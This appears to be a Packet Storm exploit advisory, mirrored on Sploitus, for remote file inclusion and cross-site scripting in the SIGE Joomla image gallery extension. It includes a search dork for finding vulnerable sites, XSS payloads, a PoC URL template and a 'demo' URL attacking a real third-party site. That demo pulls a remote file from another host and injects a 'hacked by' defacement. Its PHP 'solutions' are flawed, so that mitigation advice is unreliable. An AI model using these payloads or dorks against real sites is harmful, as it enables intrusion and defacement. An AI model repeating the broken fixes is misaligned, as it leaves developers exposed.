Share
## https://sploitus.com/exploit?id=PACKETSTORM:160023
# Title: SIGE - Simple Image Gallery Extended joomla extension 3.4.1-FREE /  
3.5.3-PRO - Multi Vulnerability Remote File Inclusion [RFI] & Cross Site  
Scripting [XSS]  
# date: 2020-11-11  
# Vendor Homepage: https://kubik-rubik.de/  
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended  
# Software Link:  
https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended  
# Software Link:  
https://extensions.joomla.org/extension/photos-a-images/galleries/sige/  
# Version : 3.4.1-FREE / 3.5.3-PRO  
# CWEs : CWE-98 / CWE-79  
# Tested on: Windows 10 & Google Chrome  
# Category : Web Application Bugs  
# Dork : intext:"Powered by Simple Image Gallery Extended"  
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"  
  
  
  
### Note:  
  
* Another web application bug is the RFI bug, which can be very dangerous  
And stands for Remote File Inclusion, which directly executes loose scripts  
on the server  
Also, this security hole is created by programmer errors  
And you must be fluent in programming language to secure and prevent this  
bug  
And you have to control the inputs of the application and use powerful  
firewalls  
  
* This bug is one of the most dangerous bugs and the access that the  
intruder can gain using this bug is the implementation of Shell script  
In fact, by running Shell script, it will have relatively complete access  
to the Target site server  
If we want to explain it in text, the hacker will execute the shell by  
giving a link from Shell script in txt format to the input of the  
vulnerable site.  
  
* what's the solution ?  
Check the file entered by the user from a list and enter it if the file was  
in the list. Example :  
<?php  
$files=array('test.gif');  
if(in_array($_GET['file'], $files)){  
include ($_GET['file']);  
}  
?>  
* If you are a server administrator, turn off allow_url_fopen from the file.  
  
* Or do it with the ini_set command. Only for (RFI)  
<?php  
ini_set('allow_url_fopen ', 'Off');  
?>  
  
* We can use the strpos command to check that if the address is: // http,  
the file will not be enclosed (it can only block RFI)  
<?php  
$strpos = strpos($_GET['url'],'http://');  
if(!$strpos){  
include($_GET['url']);  
}  
?>  
  
* Using str_replace we can give the given address from two characters "/",  
"." Let's clean up.  
<?php  
$url=$_GET['url'];  
$url = str_replace("/", "", $url);  
$url = str_replace(".", "", $url);  
include($url);  
?>  
  
  
  
  
### Xss Alert Code: "><svg onload=alert()>  
  
'><script>alert('');</script>  
  
<IMG "'"><script>alert()</script>'>  
  
And Etc.  
  
  
  
  
### Demo :  
  
[+]  
http://med.mui.ac.ir/oldsite/plugins/content/sige/plugin_sige/print.php?img=http://cheryco.ir/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E  
  
  
  
  
### Poc :  
  
[+] site.com/[folders]/print.php?img=[RFI] &name=[XSS] title=[XSS]  
  
  
  
  
### Contact Me :  
  
* Email : h4shursec@gmail.com  
* twitter : @h4shur  
* Telegram : @h4shur  
* Instagram : @netedit0r